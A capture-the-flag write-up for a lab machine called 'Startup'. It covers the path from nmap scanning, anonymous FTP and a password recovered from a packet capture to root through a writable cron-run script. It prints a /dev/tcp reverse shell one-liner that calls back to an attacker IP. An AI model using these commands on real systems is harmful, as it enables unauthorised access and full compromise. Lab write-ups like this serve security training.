# Startup

## Nmap

```
sudo nmap 10.10.85.9 -p- -sS -sV     

PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
```

Anonymous login is allowed on FTP. We have two files a jpg and a txt document. I downloaded both. I also checked for file upload on the ftp directory within and was able to upload a test document.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f0e405e4e4f917465c561a61deeaa4467f855bbf%2Fimage.png?alt=media)

**Contents of notice.jpg:**

```
Whoever is leaving these damn Among Us memes in this share.
It IS NOT FUNNY. People downloading documents from our website 
will think we are a joke! Now I dont know who it is, but Maya is 
looking pretty sus.
```

**Important.jpg:**

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-a2261b195d24197775c051f2a92179fcee149706%2Fimage.png?alt=media)

```
python3 dirsearch.py -u http://10.10.85.9 -w /usr/share/seclists/Discovery/Web-Content/big.txt -t 60 --full-url 
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dca9c199492876a80d85a2662890f499dee51170%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-d42dcc873290ee1129f4631676ad8c1c9ff80f97%2Fimage.png?alt=media)

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-dff1d7947ed4fc4eeb48e4c660d3b3af1ec4dff0%2Fimage.png?alt=media)

Looking through the directories in '/' we have the incidents folders and within with have a pcapng file of interest. We can host a Python SimpleHTTPServer on the target machine in this directory.

```
python -m SimpleHTTPServer 8080
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-04c4edc22d36940914dbccb91488a43fe9805b14%2Fimage.png?alt=media)

Then use `wget` on our attacking machine to download the pcapng file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-79793e01cf967d50dcf99996bbeb5f7e593e24c5%2Fimage.png?alt=media)

Going through Wireshark manually for each packet we find an interesting string on packet #178.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-bd8f684c05b08901b93203585eb1e984deb0f7b1%2Fimage.png?alt=media)

Right clicking the packet and following the TCP Stream reveals more information and shows a command history log from a web shell. Likely due to previous compromise.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-fc9a8a89df3b6a0f803333b54790d8b20d93f44f%2Fimage.png?alt=media)

We cant take the password value and SSH in as the other user on the box who is Lennie.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0f9b7a5618f085a50210b6444dc50b17e769a2e8%2Fimage.png?alt=media)

We can see from Lennie's home directory a scripts folder. planner.sh is of interest but looks like we are unable to manipulate the file.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-73146123c20d9030e670403d7ceeb5df18a02b35%2Fimage.png?alt=media)

However, the file print.sh which is executed as part of planner.sh is owned by us.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-75932c48d2456175cf16a52d0c736837dfaad06f%2Fimage.png?alt=media)

First we need to check if the scripts are executed as part of a timed process. I downloaded pspy64 onto the attacking machine and executed.

After a short while we see the following is executed on regular intervals:

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-78ecb9d5373dd0b171a6a950d94c695daf1b6b45%2Fimage.png?alt=media)

As such we can replace the contents of /etc/print.sh with that of a reverse shell and wait for a root shell to spawn.

```
echo  > /etc/print.sh
echo '0<&196;exec 196<>/dev/tcp/10.14.3.108/443; sh <&196 >&196 2>&196' > /etc/print.sh
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6c8534c84fc9c22e514625c09ded12333f58ccc2%2Fimage.png?alt=media)

As soon receive a shell as root.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-6a5b0579a5af492a0af104b3085d837a5418935d%2Fimage.png?alt=media)